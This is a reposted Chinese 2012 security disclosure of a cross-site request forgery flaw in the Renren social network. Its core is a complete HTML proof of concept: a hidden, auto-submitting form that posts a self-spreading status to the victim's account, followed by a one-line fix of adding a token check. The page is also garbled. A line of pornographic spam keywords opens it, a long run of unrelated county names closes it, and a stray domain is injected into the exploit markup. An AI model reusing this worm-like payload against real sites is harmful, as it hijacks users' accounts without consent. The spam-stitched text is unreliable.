最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

人人網(wǎng)CSRF漏洞曝光及修復(fù)方案

  發(fā)布時(shí)間:2012-05-17 10:30:10   作者:佚名   我要評(píng)論
CSRF(Cross-site request forgery跨站請(qǐng)求偽造,也被稱成為“one click attack”或者session riding,通??s寫(xiě)為CSRF或者XSRF,是一種對(duì)網(wǎng)站的惡意利用。盡管聽(tīng)起來(lái)像跨站腳本(XSS),但它與XSS非常不同,并且攻擊方式幾乎相左。XSS利用站點(diǎn)內(nèi)的信任用戶,而CSRF則通
腳本頁(yè)面http://bookman.sinaapp.com/doover.php,訪問(wèn)該頁(yè)面后會(huì)發(fā)送一條狀態(tài)“已經(jīng)結(jié)束了,這是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php”
詳細(xì)說(shuō)明:
看了下那個(gè)鏈接的源代碼,是通過(guò)人人逛街的接口提交的。
接口地址http://j.renren.com/publisher/status,只要POST一個(gè)參數(shù)content到接口即可。
這個(gè)頁(yè)面post的content內(nèi)容就是“已經(jīng)結(jié)束了,這是我的自白XXXX”。
 

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>愛(ài)你的說(shuō)</title>
 
 
</head>
<body>
<iframe name="destination" width="0" height="0"></iframe>
 
數(shù)字bookman愛(ài)你。歡迎訪問(wèn)“肖寒Bookman”的人人空間。
 
 
<div id="kokia" style="float:left;display:none;">
 
  <form id="akiko" name="akiko" action="http://j.renren.com/publisher/status" method="POST" target="destination">
   <input type="text" name="synsbcp" www.fzitv.net value="1"/>
  <p>raw: <input type="text" name="content" value="已經(jīng)結(jié)束了,這是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php"/></p>
  <input type="submit" value="Submit" />
</form>
 
</div>
 
 
<script>
       document.akiko.submit();
</script>
</body>
 
 
 
</html>
 

 
修復(fù)方案:
人人比我懂的多。以前有次flash的類(lèi)似的,傳播是站內(nèi)信吧。
補(bǔ)漏洞很簡(jiǎn)單,加一個(gè)token驗(yàn)證即可。
低級(jí)錯(cuò)誤一枚,從網(wǎng)不行啊。

作者 leo108 AND 白熊一枚

相關(guān)文章

最新評(píng)論

江永县| 廉江市| 开封县| 年辖:市辖区| 丰城市| 涟源市| 固安县| 香港 | 威宁| 桂阳县| 蒙城县| 合阳县| 蓬安县| 漯河市| 密云县| 灌云县| 平南县| 库尔勒市| 白朗县| 海安县| 溧阳市| 通道| 千阳县| 淳化县| 渝北区| 安阳县| 麻城市| 咸宁市| 酉阳| 桓仁| 房产| 临漳县| 怀集县| 本溪市| 望奎县| 柳林县| 哈密市| 聂拉木县| 武功县| 鄂托克旗| 孟津县|